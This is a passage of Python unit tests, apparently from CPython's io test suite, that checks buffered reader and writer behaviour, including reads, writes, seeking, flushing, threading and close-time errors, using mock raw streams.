record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. 
raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = 
self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) 
        # (Tail of a read1 test that begins before this chunk: each read1(100)
        # call should return exactly one chunk from the mock raw stream and
        # perform exactly one more raw read.)
        self.assertEqual(b"c", bufio.read1(100))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"d", bufio.read1(100))
        self.assertEqual(rawio._reads, 2)
        self.assertEqual(b"efg", bufio.read1(100))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1(100))
        self.assertEqual(rawio._reads, 4)

    def test_read1_arbitrary(self):
        # read1() with no size / -1 returns whatever one raw read yields.
        # self.tp / self.MockRawIO come from the test mixin defined earlier
        # in this file.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"bc", bufio.read1())
        self.assertEqual(b"d", bufio.read1())
        self.assertEqual(b"efg", bufio.read1(-1))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1())
        self.assertEqual(rawio._reads, 4)

    def test_readinto(self):
        # readinto() fills the caller's buffer across raw-chunk boundaries;
        # at EOF it returns a short count, then 0, leaving the remainder of
        # the buffer untouched (hence b"gf" after the 1-byte fill).
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        b = bytearray(2)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"cd")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ef")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"gf")
        self.assertEqual(bufio.readinto(b), 0)
        self.assertEqual(b, b"gf")
        # A None chunk from the raw stream (simulated EWOULDBLOCK) stops the
        # fill early with a short count.
        rawio = self.MockRawIO((b"abc", None))
        bufio = self.tp(rawio)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"cb")

    def test_readinto1(self):
        # readinto1() performs at most one raw read; track rawio._reads to
        # verify no extra raw calls happen while buffered data remains.
        buffer_size = 10
        rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
        bufio = self.tp(rawio, buffer_size=buffer_size)
        b = bytearray(2)
        self.assertEqual(bufio.peek(3), b'abc')
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 1)
        self.assertEqual(b[:1], b"c")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"de")
        self.assertEqual(rawio._reads, 2)
        # With a destination larger than the internal buffer, a single
        # readinto1() may still consume more than one pending chunk.
        b = bytearray(2*buffer_size)
        self.assertEqual(bufio.peek(3), b'fgh')
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(bufio.readinto1(b), 6)
        self.assertEqual(b[:6], b"fghjkl")
        self.assertEqual(rawio._reads, 4)

    def test_readinto_array(self):
        # readinto() counts *bytes*, not array elements, when given a buffer
        # with itemsize > 1.
        buffer_size = 60
        data = b"a" * 26
        rawio = self.MockRawIO((data,))
        bufio = self.tp(rawio, buffer_size=buffer_size)

        # Create an array with element size > 1 byte
        b = array.array('i', b'x' * 32)
        assert len(b) != 16

        # Read into it. We should get as many *bytes* as we can fit into b
        # (which is more than the number of elements)
        n = bufio.readinto(b)
        self.assertGreater(n, len(b))

        # Check that old contents of b are preserved
        bm = memoryview(b).cast('B')
        self.assertLess(n, len(bm))
        self.assertEqual(bm[:n], data[:n])
        self.assertEqual(bm[n:], b'x' * (len(bm[n:])))

    def test_readinto1_array(self):
        # Same itemsize->1 byte-count check as above, but for readinto1().
        buffer_size = 60
        data = b"a" * 26
        rawio = self.MockRawIO((data,))
        bufio = self.tp(rawio, buffer_size=buffer_size)

        # Create an array with element size > 1 byte
        b = array.array('i', b'x' * 32)
        assert len(b) != 16

        # Read into it. We should get as many *bytes* as we can fit into b
        # (which is more than the number of elements)
        n = bufio.readinto1(b)
        self.assertGreater(n, len(b))

        # Check that old contents of b are preserved
        bm = memoryview(b).cast('B')
        self.assertLess(n, len(bm))
        self.assertEqual(bm[:n], data[:n])
        self.assertEqual(bm[n:], b'x' * (len(bm[n:])))

    def test_readlines(self):
        # readlines() honours the optional hint argument (stop once the hint
        # is exceeded); None means no limit.
        def bufio():
            rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
            return self.tp(rawio)
        self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
        self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
        self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])

    def test_buffering(self):
        # Check how buffered read sizes map onto raw read sizes for several
        # buffer sizes: each entry is [bufsize, buffered reads, raw reads].
        data = b"abcdefghi"
        dlen = len(data)

        tests = [
            [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
            [ 100, [ 3, 3, 3], [ dlen ] ],
            [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
        ]

        for bufsize, buf_read_sizes, raw_read_sizes in tests:
            rawio = self.MockFileIO(data)
            bufio = self.tp(rawio, buffer_size=bufsize)
            pos = 0
            for nbytes in buf_read_sizes:
                self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
                pos += nbytes
            # this is mildly implementation-dependent
            self.assertEqual(rawio.read_history, raw_read_sizes)

    def test_read_non_blocking(self):
        # Inject some None's in there to simulate EWOULDBLOCK
        rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcd", bufio.read(6))
        self.assertEqual(b"e", bufio.read(1))
        self.assertEqual(b"fg", bufio.read())
        self.assertEqual(b"", bufio.peek(1))
        # With no buffered data and a would-block raw read, read() returns
        # None rather than b"".
        self.assertIsNone(bufio.read())
        self.assertEqual(b"", bufio.read())

        rawio = self.MockRawIO((b"a", None, None))
        self.assertEqual(b"a", rawio.readall())
        self.assertIsNone(rawio.readall())

    def test_read_past_eof(self):
        # An over-large size request returns everything available.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)

        self.assertEqual(b"abcdefg", bufio.read(9000))

    def test_read_all(self):
        # read() with no size reads to EOF.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)

        self.assertEqual(b"abcdefg", bufio.read())

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes with exactly the same number of 0's,
            # 1's... 255's. This will help us check that concurrent reading
            # doesn't duplicate or forget contents.
            # (Body of test_threads, continued: 20 threads read concurrently
            # from one BufferedReader; the byte histogram of everything read
            # must match what was written — no duplication, no loss.)
            N = 1000
            l = list(range(256)) * N
            random.shuffle(l)
            s = bytes(bytearray(l))
            with self.open(support.TESTFN, "wb") as f:
                f.write(s)
            with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                results = []
                def f():
                    try:
                        # Intra-buffer read then buffer-flushing read
                        for n in cycle([1, 19]):
                            s = bufio.read(n)
                            if not s:
                                break
                            # list.append() is atomic
                            results.append(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                                 "the following exceptions were caught: %r" % errors)
                s = b''.join(results)
                for i in range(256):
                    c = bytes(bytearray([i]))
                    self.assertEqual(s.count(c), N)
        finally:
            support.unlink(support.TESTFN)

    def test_unseekable(self):
        # tell()/seek() on an unseekable raw stream raise
        # UnsupportedOperation, both before and after a read.
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        bufio.read(1)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        self.assertRaises(self.UnsupportedOperation, bufio.tell)

    def test_misbehaved_io(self):
        # A raw object that lies about seek results makes seek/tell fail
        # with OSError instead of corrupting state.
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)

        # Silence destructor error
        bufio.close = lambda: None

    def test_no_extraneous_read(self):
        # Issue #9550; when the raw IO object has satisfied the read request,
        # we should not issue any additional reads, otherwise it may block
        # (e.g. socket).
        bufsize = 16
        for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
            rawio = self.MockRawIO([b"x" * n])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            # Simple case: one raw read is enough to satisfy the request.
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
            # A more complex case where two raw reads are needed to
            # satisfy the request.
            rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))

    def test_read_on_closed(self):
        # Issue #23796
        b = io.BufferedReader(io.BytesIO(b"12"))
        b.read(1)
        b.close()
        self.assertRaises(ValueError, b.peek)
        self.assertRaises(ValueError, b.read1, 1)

    def test_truncate_on_read_only(self):
        # A read-only buffered object refuses truncate().
        rawio = self.MockFileIO(b"abc")
        bufio = self.tp(rawio)
        self.assertFalse(bufio.writable())
        self.assertRaises(self.UnsupportedOperation, bufio.truncate)
        self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)


class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
    # Runs the shared BufferedReaderTest suite against the C implementation.
    tp = io.BufferedReader

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # Invalid buffer sizes raise at __init__ and leave the object
        # unusable (subsequent read() raises ValueError).
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.read)

    def test_misbehaved_io_read(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading different, so that
        # checking this is not so easy.
        self.assertRaises(OSError, bufio.read, 10)

    def test_garbage_collection(self):
        # C BufferedReader objects are collected.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.f = f  # reference cycle, so only the GC can reclaim it
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedReader"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)


class PyBufferedReaderTest(BufferedReaderTest):
    # Runs the shared suite against the pure-Python implementation.
    tp = pyio.BufferedReader


class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
    write_mode = "wb"

    def test_constructor(self):
        # __init__ may be called again to re-configure the buffer size;
        # invalid sizes raise ValueError.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(3, bufio.write(b"abc"))
        bufio.flush()
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        bufio.__init__(rawio)
        self.assertEqual(3, bufio.write(b"ghi"))
        bufio.flush()
        self.assertEqual(b"".join(rawio._write_stack), b"abcghi")

    def test_uninitialized(self):
        # An object created via __new__ (no __init__) must reject write()
        # until properly initialized.
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               bufio.write, b'')
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.write(b''), 0)

    def test_detach_flush(self):
        # detach() flushes buffered data to the raw stream.
        raw = self.MockRawIO()
        buf = self.tp(raw)
        buf.write(b"howdy!")
        self.assertFalse(raw._write_stack)
        buf.detach()
        self.assertEqual(raw._write_stack, [b"howdy!"])

    def test_write(self):
        # Write to the buffered IO but don't overflow the buffer.
        # (Body of test_write, continued.) The writer must copy the caller's
        # buffer: mutating it after write() must not change what is flushed.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        self.assertFalse(writer._write_stack)
        buffer = bytearray(b"def")
        bufio.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        bufio.flush()
        self.assertEqual(b"".join(writer._write_stack), b"abcdef")

    def test_write_overflow(self):
        # Writing past the buffer size forces implicit flushes.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        contents = b"abcdefghijklmnop"
        for n in range(0, len(contents), 3):
            bufio.write(contents[n:n+3])
        flushed = b"".join(writer._write_stack)
        # At least (total - 8) bytes were implicitly flushed, perhaps more
        # depending on the implementation.
        self.assertTrue(flushed.startswith(contents[:-8]), flushed)

    def check_writes(self, intermediate_func):
        # Lots of writes, test the flushed output is as expected.
        # intermediate_func(bufio) is invoked between writes so callers can
        # interleave flush/seek/truncate operations.
        contents = bytes(range(256)) * 1000
        n = 0
        writer = self.MockRawIO()
        bufio = self.tp(writer, 13)
        # Generator of write sizes: repeat each N 15 times then proceed to N+1
        def gen_sizes():
            for size in count(1):
                for i in range(15):
                    yield size
        sizes = gen_sizes()
        while n < len(contents):
            size = min(next(sizes), len(contents) - n)
            self.assertEqual(bufio.write(contents[n:n+size]), size)
            intermediate_func(bufio)
            n += size
        bufio.flush()
        self.assertEqual(contents, b"".join(writer._write_stack))

    def test_writes(self):
        self.check_writes(lambda bufio: None)

    def test_writes_and_flushes(self):
        self.check_writes(lambda bufio: bufio.flush())

    def test_writes_and_seeks(self):
        # Seeking around (absolute then relative) between writes must not
        # corrupt the flushed output.
        def _seekabs(bufio):
            pos = bufio.tell()
            bufio.seek(pos + 1, 0)
            bufio.seek(pos - 1, 0)
            bufio.seek(pos, 0)
        self.check_writes(_seekabs)
        def _seekrel(bufio):
            pos = bufio.seek(0, 1)
            bufio.seek(+1, 1)
            bufio.seek(-1, 1)
            bufio.seek(pos, 0)
        self.check_writes(_seekrel)

    def test_writes_and_truncates(self):
        self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))

    def test_write_non_blocking(self):
        raw = self.MockNonBlockWriterIO()
        bufio = self.tp(raw, 8)

        self.assertEqual(bufio.write(b"abcd"), 4)
        self.assertEqual(bufio.write(b"efghi"), 5)
        # 1 byte will be written, the rest will be buffered
        raw.block_on(b"k")
        self.assertEqual(bufio.write(b"jklmn"), 5)

        # 8 bytes will be written, 8 will be buffered and the rest will be lost
        raw.block_on(b"0")
        try:
            bufio.write(b"opqrwxyz0123456789")
        except self.BlockingIOError as e:
            written = e.characters_written
        else:
            self.fail("BlockingIOError should have been raised")
        self.assertEqual(written, 16)
        self.assertEqual(raw.pop_written(),
                         b"abcdefghijklmnopqrwxyz")

        self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
        s = raw.pop_written()
        # Previously buffered bytes were flushed
        self.assertTrue(s.startswith(b"01234567A"), s)

    def test_write_and_rewind(self):
        # Seeking backwards flushes, and overwrites land at the seek target.
        raw = io.BytesIO()
        bufio = self.tp(raw, 4)
        self.assertEqual(bufio.write(b"abcdef"), 6)
        self.assertEqual(bufio.tell(), 6)
        bufio.seek(0, 0)
        self.assertEqual(bufio.write(b"XY"), 2)
        bufio.seek(6, 0)
        self.assertEqual(raw.getvalue(), b"XYcdef")
        self.assertEqual(bufio.write(b"123456"), 6)
        bufio.flush()
        self.assertEqual(raw.getvalue(), b"XYcdef123456")

    def test_flush(self):
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        bufio.flush()
        self.assertEqual(b"abc", writer._write_stack[0])

    def test_writelines(self):
        l = [b'ab', b'cd', b'ef']
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.writelines(l)
        bufio.flush()
        self.assertEqual(b''.join(writer._write_stack), b'abcdef')

    def test_writelines_userlist(self):
        # writelines() accepts any iterable of bytes-likes, not just list.
        l = UserList([b'ab', b'cd', b'ef'])
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.writelines(l)
        bufio.flush()
        self.assertEqual(b''.join(writer._write_stack), b'abcdef')

    def test_writelines_error(self):
        # Non-bytes items, None, and str all raise TypeError.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
        self.assertRaises(TypeError, bufio.writelines, None)
        self.assertRaises(TypeError, bufio.writelines, 'abc')

    def test_destructor(self):
        # Dropping the last reference flushes pending data.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        del bufio
        support.gc_collect()
        self.assertEqual(b"abc", writer._write_stack[0])

    def test_truncate(self):
        # Truncate implicitly flushes the buffer.
        self.addCleanup(support.unlink, support.TESTFN)
        with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
            bufio = self.tp(raw, 8)
            bufio.write(b"abcdef")
            self.assertEqual(bufio.truncate(3), 3)
            self.assertEqual(bufio.tell(), 6)
        with self.open(support.TESTFN, "rb", buffering=0) as f:
            self.assertEqual(f.read(), b"abc")

    def test_truncate_after_write(self):
        # Ensure that truncate preserves the file position after
        # writes longer than the buffer size.
        # Issue: https://bugs.python.org/issue32228
        self.addCleanup(support.unlink, support.TESTFN)
        with self.open(support.TESTFN, "wb") as f:
            # Fill with some buffer
            f.write(b'\x00' * 10000)
        buffer_sizes = [8192, 4096, 200]
        for buffer_size in buffer_sizes:
            with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
                f.write(b'\x00' * (buffer_size + 1))
                # After write write_pos and write_end are set to 0
                f.read(1)
                # read operation makes sure that pos != raw_pos
                f.truncate()
                self.assertEqual(f.tell(), buffer_size + 2)

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes from many threads and test they were
            # all flushed.
            N = 1000
            contents = bytes(range(256)) * N
            sizes = cycle([1, 19])
            n = 0
            queue = deque()
            while n < len(contents):
                size = next(sizes)
                queue.append(contents[n:n+size])
                n += size
            del contents
            # We use a real file object because it allows us to
            # exercise situations where the GIL is released before
            # writing the buffer to the raw streams. This is in addition
            # to concurrency issues due to switching threads in the middle
            # of Python code.
            # (Body of writer test_threads, continued: 20 threads drain a
            # shared deque into one BufferedWriter; the resulting file's byte
            # histogram must match the generated contents exactly.)
            with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                def f():
                    try:
                        while True:
                            try:
                                s = queue.popleft()
                            except IndexError:
                                return
                            bufio.write(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                                 "the following exceptions were caught: %r" % errors)
                bufio.close()

            with self.open(support.TESTFN, "rb") as f:
                s = f.read()
            for i in range(256):
                self.assertEqual(s.count(bytes([i])), N)
        finally:
            support.unlink(support.TESTFN)

    def test_misbehaved_io(self):
        # Broken raw seek/tell makes seek, tell and overflowing writes fail
        # with OSError.
        rawio = self.MisbehavedRawIO()
        bufio = self.tp(rawio, 5)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)
        self.assertRaises(OSError, bufio.write, b"abcdef")

        # Silence destructor error
        bufio.close = lambda: None

    def test_max_buffer_size_removal(self):
        # The legacy third positional arg (max_buffer_size) was removed.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), 8, 12)

    def test_write_error_on_close(self):
        raw = self.MockRawIO()
        def bad_write(b):
            raise OSError()
        raw.write = bad_write
        b = self.tp(raw)
        b.write(b'spam')
        self.assertRaises(OSError, b.close) # exception not swallowed
        self.assertTrue(b.closed)

    def test_slow_close_from_thread(self):
        # Issue #31976
        rawio = self.SlowFlushRawIO()
        bufio = self.tp(rawio, 8)
        t = threading.Thread(target=bufio.close)
        t.start()
        rawio.in_flush.wait()
        self.assertRaises(ValueError, bufio.write, b'spam')
        self.assertTrue(bufio.closed)
        t.join()


class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
    # Runs the shared BufferedWriterTest suite against the C implementation.
    tp = io.BufferedWriter

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedWriterTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # Invalid buffer sizes raise at __init__ and leave write() unusable.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")

    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.write(b"123xxx")
            f.x = f  # reference cycle, so only the GC can reclaim it
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)


class PyBufferedWriterTest(BufferedWriterTest):
    # Runs the shared suite against the pure-Python implementation.
    tp = pyio.BufferedWriter


class BufferedRWPairTest(unittest.TestCase):

    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)

    def test_uninitialized(self):
        # __new__ without __init__ must reject both read() and write().
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.read, 0)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)

    def test_detach(self):
        # A pair wraps two streams, so there is no single stream to detach.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertRaises(self.UnsupportedOperation, pair.detach)

    def test_constructor_max_buffer_size_removal(self):
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)

    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False

        self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())

    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False

        self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())

